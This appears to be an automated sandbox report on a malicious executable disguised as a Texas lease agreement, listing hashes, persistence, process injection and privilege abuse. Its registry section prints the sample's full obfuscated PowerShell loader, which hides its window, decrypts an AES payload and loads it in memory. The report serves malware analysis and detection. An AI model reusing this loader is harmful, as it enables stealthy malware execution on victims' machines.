Analysis
max time kernel: 149s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 12-03-2022 14:22
Static task: static1
Behavioral task: behavioral1
  Sample: One-Page-Lease-Agreement-Texas.exe
  Resource: win7-20220310-en
Behavioral task: behavioral2
  Sample: One-Page-Lease-Agreement-Texas.exe
  Resource: win10v2004-en-20220113
General
Target: One-Page-Lease-Agreement-Texas.exe
Size: 261.0MB
MD5: 7194384ed0ce511e24b0e119d0d068f6
SHA1: 9ea9e3f52602988a922e8d8fda000f060be2b248
SHA256: 7cc35fbce4b353c541f1ee62366248cc072d1c7ce38b1d5ef5db4a2414f26e08
SHA512: 0faea84e368d301b7b056630b82c9f2a49f01252e66f5699ddf81f879d22fc74e08a810252e87a58cd9e5b147e9c1682678308781d08fd65e2edb2c8017c98d7
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  pid 4396  iduebjqc.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation  (One-Page-Lease-Agreement-Texas.exe)

Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyDqoFiwUBttaIYCDkCXBUPxaGxw.lnk  (One-Page-Lease-Agreement-Texas.exe)

Loads dropped DLL (6 IoCs)
  pid 4396  iduebjqc.exe
  pid 4396  iduebjqc.exe
  pid 3964  MsiExec.exe
  pid 3964  MsiExec.exe
  pid 3964  MsiExec.exe
  pid 3964  MsiExec.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by iduebjqc.exe (24 entries): \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
  File opened (read-only) by msiexec.exe (24 entries): \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
  (every drive letter except C: and D:, by each process)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (7 IoCs)
All entries by process One-Page-Lease-Agreement-Texas.exe:
  Key created: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell
  Key created: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open
  Set value (str): \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('ggWCtN05dQLaZyRJ5b0VxCgZo3M8oTV/eM6siucTGPA=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\PoQNVvNZEgZozVP\\PptGnYfGJTsjAIQdA.XEIMYyBrmwTOYQPmdMQAvChFOjLmD'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[OX2ZGtuX4Enq17E.rm4m44ex6Y5ffYLh]::BDBOvPl7ZyRDJU_sfUSE();\""
  Key created: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\.xeimyybrmwtoyqpmdmqavchfojlmd
  Set value (str): \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\.xeimyybrmwtoyqpmdmqavchfojlmd\ = "yechrywixkzazxgoclbxsph"
  Key created: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph\shell\open\command
  Key created: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\yechrywixkzazxgoclbxsph
Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid 1164  One-Page-Lease-Agreement-Texas.exe  (7 entries)
Suspicious use of AdjustPrivilegeToken (60 IoCs)
  pid 4396  iduebjqc.exe, the following 29 tokens, each recorded twice (58 entries): SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  pid 1800  msiexec.exe: SeSecurityPrivilege (recorded between the two iduebjqc.exe runs)
  pid 1164  One-Page-Lease-Agreement-Texas.exe: SeDebugPrivilege (last entry)
Suspicious use of FindShellTrayWindow (1 IoC)
  pid 4396  iduebjqc.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  PID 4556 (One-Page-Lease-Agreement-Texas.exe) wrote to memory of 4396, procid_target 85  (3 entries)
  PID 4556 (One-Page-Lease-Agreement-Texas.exe) wrote to memory of 1164, procid_target 86  (2 entries)
  PID 1800 (msiexec.exe) wrote to memory of 3964, procid_target 91  (3 entries)
  PID 1164 (One-Page-Lease-Agreement-Texas.exe) wrote to memory of 2016, procid_target 95  (2 entries)
  PID 2016 (csc.exe) wrote to memory of 4440, procid_target 97  (2 entries)
Processes

C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4556

    C:\Users\Admin\AppData\Local\Temp\iduebjqc.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\iduebjqc.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates connected drives
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      PID:4396

    C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\One-Page-Lease-Agreement-Texas.exe" /y
      - Drops startup file
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:1164

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krus1utw\krus1utw.cmdline"
          - Suspicious use of WriteProcessMemory
          PID:2016

            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES830E.tmp" "c:\Users\Admin\AppData\Local\Temp\krus1utw\CSC456D158DA3C24CA780828AD6FFF34C5.TMP"
              PID:4440

C:\Windows\system32\msiexec.exe
  command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1800

    C:\Windows\syswow64\MsiExec.exe
      command line: C:\Windows\syswow64\MsiExec.exe -Embedding F777F4F00FC961CCE46EC3725A517D45 C
      - Loads dropped DLL
      PID:3964